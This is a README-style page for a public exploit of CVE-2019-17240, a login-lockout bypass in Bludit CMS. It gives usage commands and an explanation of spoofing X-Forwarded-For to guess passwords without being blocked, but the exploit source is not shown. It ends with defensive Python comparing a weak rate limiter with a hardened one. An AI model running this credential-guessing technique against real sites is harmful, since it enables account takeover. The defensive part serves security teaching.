Exploit Code for CVE-2019-17240 aka Bludit <= 3.9.2 Bruteforce Mitigation Bypass
Exploit Links: [ExploitDB-48942] [PacketStorm]
Expected outcome: discover valid login credentials by bypassing the brute-force mitigation on a host running Bludit <= 3.9.2.
Intended only for educational and testing in corporate environments.
This exploit was tested with Python 3.8.6.
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]

Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     Path to Bludit (Example: http://127.0.0.1/admin/login.php)
  -u USERLIST, --userlist USERLIST
                        Username Dictionary
  -p PASSLIST, --passlist PASSLIST
                        Password Dictionary
Exploit usage:
  ./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
  ./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
- Make sure Python 3 is installed along with the following additional modules:
  - requests
  - pwn
Installation:
  pip3 install pwn
  pip3 install requests
This exploit expects three user inputs:
- URL: the login page URL
- user.txt: a list of candidate usernames (for PoC purposes user.txt holds a single username)
- pass.txt: a dictionary of candidate passwords
Running the exploit: the username in user.txt is paired with every password in pass.txt, and each pair is submitted to the login page:
Each request carries a value taken from pass.txt in the X-Forwarded-For header. If the list contains only a few passwords, there is a chance that a word gets blocked by the server; in that case the script prints the blocked word in its output:
On a successful login, the following output with the working credentials is shown:
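The bypass works because the lockout is keyed on an address the client itself supplies in X-Forwarded-For, so every attempt can look like a new client. The following Python is an added illustration for defenders, not the exploit's or Bludit's own code: it places that weak pattern beside a hardened rate limiter that honours X-Forwarded-For only when the request arrives from a trusted reverse proxy and otherwise keys on REMOTE_ADDR. The trusted proxy address, the thresholds and the simulated client address are constructed assumptions.

```python
"""Login throttle keyed on client IP: the weak form that trusts
X-Forwarded-For unconditionally, beside a hardened form that only
honours the header when the TCP peer is a trusted proxy.
Added illustration; not Bludit's code."""
import time
from collections import defaultdict

MAX_FAILED = 10                  # assumed: failed attempts allowed before blocking
BLOCK_SECONDS = 300              # assumed: block duration once the limit is hit
TRUSTED_PROXIES = {"10.0.0.1"}   # constructed: reverse proxy addresses we control


def client_ip_weak(env):
    """Vulnerable pattern: the caller picks its own rate-limit key by
    setting X-Forwarded-For, so each attempt can appear as a new client.
    The value does not even need to be an IP address."""
    return env.get("HTTP_X_FORWARDED_FOR") or env.get("REMOTE_ADDR")


def client_ip_hardened(env):
    """Use X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then take the rightmost entry (the one our proxy appended). Otherwise
    key on REMOTE_ADDR, which comes from the socket and cannot be forged."""
    peer = env.get("REMOTE_ADDR", "")
    xff = env.get("HTTP_X_FORWARDED_FOR", "")
    if peer in TRUSTED_PROXIES and xff:
        return xff.split(",")[-1].strip()
    return peer


class LoginThrottle:
    """Counts failed logins per key and blocks a key after MAX_FAILED."""

    def __init__(self, ip_func, now=time.time):
        self.ip_func = ip_func
        self.now = now
        self.failed = defaultdict(int)
        self.blocked_until = {}

    def is_blocked(self, env):
        ip = self.ip_func(env)
        until = self.blocked_until.get(ip)
        if until is None:
            return False
        if self.now() >= until:          # block expired: reset the counter
            del self.blocked_until[ip]
            self.failed[ip] = 0
            return False
        return True

    def record_failure(self, env):
        ip = self.ip_func(env)
        self.failed[ip] += 1
        if self.failed[ip] >= MAX_FAILED:
            self.blocked_until[ip] = self.now() + BLOCK_SECONDS


def simulate_guessing(ip_func, attempts):
    """Replay `attempts` failed logins from one real address, each with a
    different X-Forwarded-For value (the pattern described above).
    Returns how many attempts reached the password check."""
    throttle = LoginThrottle(ip_func)
    reached = 0
    for i in range(attempts):
        env = {"REMOTE_ADDR": "203.0.113.7",        # constructed client address
               "HTTP_X_FORWARDED_FOR": f"spoof-{i}"}  # constructed per-request value
        if throttle.is_blocked(env):
            continue
        reached += 1
        throttle.record_failure(env)
    return reached


if __name__ == "__main__":
    print("weak limiter let through:", simulate_guessing(client_ip_weak, 50))
    print("hardened limiter let through:", simulate_guessing(client_ip_hardened, 50))
```

With the weak key function all 50 attempts reach the password check; with the hardened one only the first 10 do, after which the real address is blocked regardless of the header. The same principle applies to any control keyed on client identity (lockouts, CAPTCHA triggers, audit logs): derive the identity from the socket address, or from a proxy header only when the peer is a proxy you operate.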
This is an exploit for the vulnerability found by Rastating in Bludit CMS.
Vulnerability explanation: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.
Patch: bludit/bludit#1090